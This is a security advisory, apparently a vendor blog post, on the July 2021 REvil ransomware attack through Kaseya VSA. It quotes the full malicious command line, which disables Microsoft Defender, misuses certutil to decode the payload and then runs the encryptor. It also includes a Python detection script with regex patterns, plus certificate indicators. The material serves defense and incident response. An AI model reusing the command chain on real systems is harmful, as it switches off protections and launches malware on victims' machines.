SpearTip | July 2nd, 2021

Kaseya Ransomware

SpearTip’s engineers have become aware of an urgent ransomware attack in progress affecting Kaseya VSA. The only way to prevent breaches is to block Kaseya VSA, whether you use the cloud service or host the solution on-premises. Kaseya is currently pushing a hotfix for this issue.

Kaseya provides IT management software to MSPs.

According to security researchers, a ransomware encryptor is being dropped to c:\kworking\agent.exe. The malicious VSA procedure is being named “Kaseya VSA Agent Hot-fix”, and at least two tasks are running:

“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
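As an added example (not from SpearTip or Kaseya), the following Python script scans process-creation command lines for the combination of indicators contained in the command quoted above: the long ping delay, Defender real-time monitoring being disabled via Set-MpPreference, certutil.exe copied to cert.exe, the -decode of agent.crt, and the c:\kworking\agent.* path. The sample events and the “CommandLine=” field format are constructed for illustration.

```python
import re

# Constructed sample process-creation events (not real telemetry): one benign,
# one matching the command line quoted in this advisory, one partial match.
SAMPLE_EVENTS = [
    r'CommandLine="C:\Windows\System32\cmd.exe" /c dir C:\Users',
    r'CommandLine="C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & '
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference '
    r'-DisableRealtimeMonitoring $true -Force & copy /Y C:\Windows\System32\certutil.exe '
    r'C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt '
    r'c:\kworking\agent.exe & c:\kworking\agent.exe',
    r'CommandLine=C:\Windows\System32\certutil.exe -decode C:\Temp\setup.b64 C:\Temp\setup.exe',
]

# Each indicator is taken from the advisory's quoted command line. A single hit
# (e.g. certutil -decode alone) is weak on its own; the combination is what matters.
INDICATORS = {
    "defender_disabled": re.compile(r"Set-MpPreference\s.*-DisableRealtimeMonitoring\s+\$true", re.I),
    "certutil_copied": re.compile(r"copy\s+/Y\s+\S*certutil\.exe\s+\S*cert\.exe", re.I),
    "certutil_decode": re.compile(r"\bcert(?:util)?\.exe\s+-decode\b", re.I),
    "kworking_agent": re.compile(r"c:\\kworking\\agent\.(?:crt|exe)", re.I),
    "ping_delay": re.compile(r"ping\s+127\.0\.0\.1\s+-n\s+\d{3,}", re.I),
}


def match_indicators(command_line: str) -> list[str]:
    """Return the names of all indicators present in one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(command_line)]


def triage(events: list[str], min_hits: int = 2) -> list[tuple[int, list[str]]]:
    """Return (event index, indicator names) for events with at least min_hits indicators."""
    results = []
    for i, event in enumerate(events):
        hits = match_indicators(event)
        if len(hits) >= min_hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Lowering min_hits to 1 surfaces the lone certutil -decode event as well, which is useful for hunting but noisier in environments where certutil is used legitimately.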

The encryptor is digitally signed with a valid signature; the certificate details are listed below under “Digital Signature used by ransomware operators”.

When the executable runs, these files are being dropped into the hardcoded path c:\Windows:

Confirmed IoCs:

Other files involved:

Additional information added 4:25 CT, Fri, Jul 2:

VSA user admin accounts are being disabled moments before the ransomware is deployed. VSA security notifications indicated that the “KEleveted######” account, which is a SQL user, performed this action; the evidence likely points to execution via SQL commands.

Digital Signature used by ransomware operators:

Name: PB03 TRANSPORT LTD.
Issuer: Sectigo RSA Code Signing CA
Thumbprint: 11FF68DA43F0931E22002F1461136C662E623366
Serial Number: 11 9A CE AD 66 8B AD 57 A4 8B 4F 42 F2 94 F8 F0

To block VSA communications at the firewall, use Kaseya’s Cloud Addresses and Ports listing.

Based on forensic investigations of the intrusion, there are strong connections to the REvil ransomware group or affiliates. REvil has targeted at least 6 large MSPs through the supply-chain attack on Kaseya’s VSA servers.

If your organization is utilizing this service and needs assistance in preventing this ransomware from spreading, call our 24/7 Security Operations Center at 833.997.7327.

Kaseya released this statement in regards to the VSA service: “We are experiencing a potential attack against the VSA that has been limited to a small number of on-premise customers only as of 2:00 PM EDT today. We are in the process of investigating the root cause of the incident with an abundance of caution but we recommend that you IMMEDIATELY shut down your VSA server until you receive further notice from us. It’s critical that you do this immediately, because one of the first things the attacker does is shut off administrative access to the VSA.”

*More information will be added to this article as our engineers investigate*